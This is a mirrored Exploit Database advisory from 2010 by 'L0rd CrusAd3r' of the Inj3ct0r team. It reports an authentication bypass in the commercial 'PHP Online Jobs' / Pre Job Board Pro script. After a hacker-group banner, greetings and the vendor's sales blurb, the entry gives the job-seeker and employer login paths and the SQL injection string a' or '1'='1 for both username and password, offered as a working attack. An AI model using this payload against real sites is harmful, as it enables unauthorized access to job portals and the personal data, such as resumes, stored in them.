Pre Job Board Pro – Authentication Bypass

• Exploit Database
• 9 阅读

• 作者： L0rd CrusAd3r
  日期： 2010-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13881/

• 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
  0 _ __ __ __ 1
  1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  1 \ \____/ >> Exploit database separated by exploit 0
  0 \/___/ type (local, remote, DoS, etc.) 1
  1 1
  0 [+] Site : Inj3ct0r.com 0
  1 [+] Support e-mail : submit[at]inj3ct0r.com 1
  0 0
  1 ########################################## 1
  0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1
  1 ########################################## 0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
  Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
  Exploit Title:PHP Online Jobs Authentication Bypass
  Vendor url:http://www.sellatsite.com
  Version:n/a
  Price:67$
  Published: 2010-06-15
  Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to
  all ICW members.
  Spl Greetz to:inj3ct0r.com Team, Andhrahackers.com
  
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  
  Description:
  
  PHP Online Jobs is an Extensive and Powerful script written in PHP to launch
  your own jobs portal with quality features (upload resume, resume search,
  pound sterling payments and much much more). It has a very high potential to
  generate very heavy online revenues for you. Script is built with a focus on
  increases ease of users and profits of webmasters.
  
  PHP Online Jobs is the most comprehensive and advanced job script package
  available online. Looking for the right job script to launch your
  professional Job Website? Look no further!
  
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  
  Vulnerability:
  
  *Authentication Bypass Vulnerability
  
  DEMO URL :
  
  Job Seeker Login:-
  
  http://server/jobpro/jobseekers/preview.php
  
  Employee Login:-
  
  http://server/jobpro/employers/postjob.php
  
  Use the string a' or '1'='1 for Username and Password to gain access.
  
  
  # 0day n0 m0re #
  # L0rd CrusAd3r #
  
  With R3gards,
  L0rd CrusAd3r